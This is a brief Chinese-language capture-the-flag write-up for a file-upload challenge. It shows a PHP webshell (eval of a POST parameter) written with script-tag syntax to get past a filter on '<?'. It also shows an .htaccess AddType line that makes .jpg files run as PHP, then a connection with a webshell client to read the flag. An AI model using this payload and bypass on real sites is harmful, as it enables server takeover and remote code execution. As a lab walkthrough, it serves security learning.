開啟靶機,上傳檔案抓包
字尾不能帶ph,大小寫也無法繞過,意味著phtml字尾也無法上傳
對字尾只過濾ph,我們轉變思路上傳圖片馬,用.htaccess使圖片馬以php格式開啟
上傳圖片馬
上傳失敗,試一試過濾了哪些字元
檔案內容過濾了<?
我們嘗試另一種寫法後成功上傳<script language="php">eval($_POST['cmd']);</script>
再上傳.htaccess AddType application/x-httpd-php .jpg
上傳成功
查詢flag過程中發現system函式被禁用,我們使用蟻劍連線
查詢flag flag{dbcf4ba5-bbb0-410a-aa50-76871ab58350}